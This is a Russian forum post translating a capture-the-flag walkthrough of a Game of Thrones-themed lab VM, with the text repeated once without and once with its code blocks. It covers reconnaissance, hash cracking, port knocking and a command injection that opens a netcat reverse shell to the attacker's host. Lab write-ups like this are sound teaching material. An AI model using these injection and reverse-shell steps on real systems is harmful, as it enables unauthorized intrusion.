Доброго времени суток, codeby.
Первоисточник:
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
Образ VM и подробное описание можно найти
Автор VM: OscarAkaElvis
Приступим.
Для начала, узнаем IP виртуальной машины (В статье она находится по адресу 192.168.1.133)
Далее используем nmap чтобы найти открытые порты и сервисы расположенные на них
Мы видим, что на 80-ом порту находится веб-сервер, поэтому мы открываем ip в нашем браузере.
Посмотрев на исходный код страницы, мы увидим синтаксис флага.
Далее, найдём директории и другие web-объекты используем dirb
Dirb нашёл файл robots.txt, открыв его, мы увидим несколько директорий
Откроем директорию /secret-island/ используя user-agent: Three-eyed-raven
прим. переводчика: автор оригинала использует Burp для изменения http-запроса.
По данному url мы найдем ссылку на карту
Открыв карту, мы узнаем местоположение всех флагов
Аналогичным способом обратимся к директории
Посмотрев исходный код, мы увидим что-то похожее на набор портов для port knocking и имя пользователя - oberynmartell.
прим. переводчика: на самом деле там 3 порта (один обрезан на исходном скрине) 3487 64535 12345
Далее мы находим /h/i/d/d/e/n/ директорию (с помощью dirb), открыв её видим следующее.
Взглянув на исходный код страницы найдём пароль для пользователя oberynmartell.
Испытаем найденные креды на ftp сервере. И мы видим первый флаг в шапке ftp-сервера.
С ftp-сервера мы скачали два файла. Один из них содержит хеш и тип хеша. Сохраним хеш в отдельный файл.
Воспользуемся john the ripper для расшифровки хеша.
Теперь используем mcrypt для расшифровки второго файла.
Добавим домен
в /etc/hosts и откроем ссылку, найденную в файле.
Введем найденные креды, и увидим страницу с двумя изображениями.
Посмотрев исходный код, найдём второй флаг.
Вместе с флагом, мы нашли намек на то что файл
что то содержит. Так что мы скачиваем файл и прогоняем его через
Таким образом мы находим ещё одну подсказку.
Подсказка даёт нам намёк на то что запись TXT будет содержать что-то полезное, поэтому мы видоизменяем домен и проверяем его с помощью nslookup (для проверки записей TXT)
Вот мы и нашли третий флаг, а вместе с ним нашли еще один домен. Добавим его в /etc/hosts и откроем в браузере.
Воспользуемся кредами из TXT записи.
Проверим форму поиска на уязвимости
Далее воспользуемся модулем файлового менеджера, он предоставит нам доступ к некоторым файлам
В директории /home/aryastark мы находим файл под названием ‘flag.txt’
Скачав его, мы получим 4ый флаг.
Теперь у нас есть подсказка для доступа к базе данных, мы уже знаем что это postgresql. Поэтому подключимся, используя креды из файла.
Мы видим view, которая называется flag, посмотрев её содержимое мы видим строку в base64
Расшифровав строку, мы получаем 5ый флаг.
Далее проверим остальные таблицы, что бы убедиться, что мы ничего не упустили. В одной из таблиц мы находим список имен.
Выглядит полезным. При дальнейшем поиске по базе данных мы находим строку в rot16.
Преобразовав её мы узнаем имя базы данных и пароль. Так же текст, намекает нам, что логин должен быть в “нашем” списке для убийства (aria_kill_list).
Испытав список целей Арии в качестве логина, мы находим нужный - TheRedWomanMelisandre.
Проверив единственную таблицу - найдём секретный флаг.
Мы уже знаем, что флаг “The Reach” находится на imap (см.карту). Используем номера портов, что мы нашли ранее для port knocking.
прим. переводчика: про порт кнокинг можно почитать тут
Проверим не появились ли новые сервисы и открытые порты. Воспользуемся nmap.
Теперь нам доступен порт 143, на котором запущен imap. Воспользуемся nc и кредами, найденными в подсказке ранее.
Мы находим 6ой флаг в папке “Входящие”. Также мы получаем следующую подсказку в виде порта 1337 и кредов.
Открываем 192.168.1.133:1337 в браузере и понимаем, что мы на git-сайте.
Просмотрев файлы, мы понимаем что сайт уязвим к инъекции команд, так же мы находим намёк на mysql.
Мы инжектим reverse shell в параметр code.
Запустив неткат в режиме прослушки (на основной машине) мы сразу же получим шелл.
Ранее на веб-страницы мы нашли строку закодированную в hex. Раскодировав её мы получим путь к файлу
Открыв данный файл - мы получим креды и имя базы данных, которую мы должны искать.
Первоисточник:
Ссылка скрыта от гостей
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
- Статья является переводом.
Образ VM и подробное описание можно найти
Ссылка скрыта от гостей
Автор VM: OscarAkaElvis
Приступим.
Для начала, узнаем IP виртуальной машины (В статье она находится по адресу 192.168.1.133)
Код:
netdiscover
Далее используем nmap чтобы найти открытые порты и сервисы расположенные на них
Код:
nmap -p- -sV 192.168.1.133
Мы видим, что на 80-ом порту находится веб-сервер, поэтому мы открываем ip в нашем браузере.
Посмотрев на исходный код страницы, мы увидим синтаксис флага.
Далее, найдём директории и другие web-объекты используем dirb
Код:
dirb http://192.168.1.133
Dirb нашёл файл robots.txt, открыв его, мы увидим несколько директорий
Откроем директорию /secret-island/ используя user-agent: Three-eyed-raven
прим. переводчика: автор оригинала использует Burp для изменения http-запроса.
По данному url мы найдем ссылку на карту
Открыв карту, мы узнаем местоположение всех флагов
Аналогичным способом обратимся к директории
Код:
/direct-access-to-kings-landing/
Посмотрев исходный код, мы увидим что-то похожее на набор портов для port knocking и имя пользователя - oberynmartell.
прим. переводчика: на самом деле там 3 порта (один обрезан на исходном скрине) 3487 64535 12345
Далее мы находим /h/i/d/d/e/n/ директорию (с помощью dirb), открыв её видим следующее.
Взглянув на исходный код страницы найдём пароль для пользователя oberynmartell.
Испытаем найденные креды на ftp сервере. И мы видим первый флаг в шапке ftp-сервера.
С ftp-сервера мы скачали два файла. Один из них содержит хеш и тип хеша. Сохраним хеш в отдельный файл.
Воспользуемся john the ripper для расшифровки хеша.
Код:
john --format=dynamic_2008 hash.txt
Теперь используем mcrypt для расшифровки второго файла.
Код:
mcrypt -d the_wall.txt.nc
Добавим домен
Код:
winterfell.7kingdoms.ctf
Введем найденные креды, и увидим страницу с двумя изображениями.
Посмотрев исходный код, найдём второй флаг.
Вместе с флагом, мы нашли намек на то что файл
Код:
stark_shield.jpg
Код:
strings
Код:
strings stark_shield.jpg
Подсказка даёт нам намёк на то что запись TXT будет содержать что-то полезное, поэтому мы видоизменяем домен и проверяем его с помощью nslookup (для проверки записей TXT)
Код:
nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133
Вот мы и нашли третий флаг, а вместе с ним нашли еще один домен. Добавим его в /etc/hosts и откроем в браузере.
Воспользуемся кредами из TXT записи.
Проверим форму поиска на уязвимости
Далее воспользуемся модулем файлового менеджера, он предоставит нам доступ к некоторым файлам
В директории /home/aryastark мы находим файл под названием ‘flag.txt’
Скачав его, мы получим 4ый флаг.
Теперь у нас есть подсказка для доступа к базе данных, мы уже знаем что это postgresql. Поэтому подключимся, используя креды из файла.
Код:
psql –h 192.168.1.133 –u robinarryn –d mountainandthevale
Мы видим view, которая называется flag, посмотрев её содержимое мы видим строку в base64
Расшифровав строку, мы получаем 5ый флаг.
Далее проверим остальные таблицы, что бы убедиться, что мы ничего не упустили. В одной из таблиц мы находим список имен.
Код:
select * from arya_kill_list
Выглядит полезным. При дальнейшем поиске по базе данных мы находим строку в rot16.
Преобразовав её мы узнаем имя базы данных и пароль. Так же текст, намекает нам, что логин должен быть в “нашем” списке для убийства (aria_kill_list).
Испытав список целей Арии в качестве логина, мы находим нужный - TheRedWomanMelisandre.
Проверив единственную таблицу - найдём секретный флаг.
Мы уже знаем, что флаг “The Reach” находится на imap (см.карту). Используем номера портов, что мы нашли ранее для port knocking.
прим. переводчика: про порт кнокинг можно почитать тут
Код:
knock 192.168.1.133 3487 64535 12345
Проверим не появились ли новые сервисы и открытые порты. Воспользуемся nmap.
Код:
nmap -p- 192.168.1.133
Теперь нам доступен порт 143, на котором запущен imap. Воспользуемся nc и кредами, найденными в подсказке ранее.
Код:
nc 192.168.1.133 143
Мы находим 6ой флаг в папке “Входящие”. Также мы получаем следующую подсказку в виде порта 1337 и кредов.
Открываем 192.168.1.133:1337 в браузере и понимаем, что мы на git-сайте.
Просмотрев файлы, мы понимаем что сайт уязвим к инъекции команд, так же мы находим намёк на mysql.
Мы инжектим reverse shell в параметр code.
Код:
nc 192.168.1.116 1234
Запустив неткат в режиме прослушки (на основной машине) мы сразу же получим шелл.
Код:
nc -lvp 1234
Ранее на веб-страницы мы нашли строку закодированную в hex. Раскодировав её мы получим путь к файлу
Код:
file:/home/tyrionlannister/checkpoint.txt
Последнее редактирование: